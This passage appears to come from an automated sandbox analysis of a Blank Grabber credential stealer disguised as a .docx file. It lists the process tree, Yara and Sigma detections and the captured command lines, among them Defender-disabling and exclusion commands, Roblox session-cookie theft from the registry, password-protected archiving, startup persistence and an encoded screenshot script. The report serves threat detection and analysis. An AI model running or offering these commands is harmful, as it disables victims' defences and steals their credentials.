ABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 7340 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 2252 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1CC2.tmp" "c:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 7388 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 1820 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 1784 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 7332 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 7908 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 3492 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 7452 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7932 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

Conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 2344 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 5268 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 8160 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 8148 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 1404 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7664 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 5680 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7712 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 1988 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7732 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1608 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 2316 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Calculator.exe (PID: 5544 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca MD5: 94675EB54AC5DAA11ACE736DBFA9E7A2)

svchost.exe (PID: 4484 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Babadeda	According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.	No Attribution	https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities	https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Cooperative Agreement0000800380.docx.exe	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI43362\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000010.00000003.2023955880.0000025C3C156000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000011.00000003.2371288192.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000011.00000003.2367455038.0000016E17B2C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000011.00000002.2372251589.0000016E16DBA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000010.00000003.2023955880.0000025C3C158000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000011.00000003.2047803547.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: chost.exe PID: 4336	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: chost.exe PID: 280	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: chost.exe PID: 280	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: chost.exe PID: 280	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Cooperative Agreement0000800380.docx.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
0.0.Cooperative Agreement0000800380.docx.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe", CommandLine: "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe, NewProcessName: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe, OriginalFileName: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe", ProcessId: 6808, ProcessName: Cooperative Agreement0000800380.docx.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: chost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\chost.exe, ParentProcessId: 280, ParentProcessName: chost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'", ProcessId: 7264, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: chost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\chost.exe, ParentProcessId: 280, ParentProcessName: chost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7272, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: chost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\chost.exe, ParentProcessId: 280, ParentProcessName: chost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *", ProcessId: 2316, ProcessName: cmd.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7264, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe', ProcessId: 7448, ProcessName: powershell.exe

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chost.exe, ProcessId: 280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIA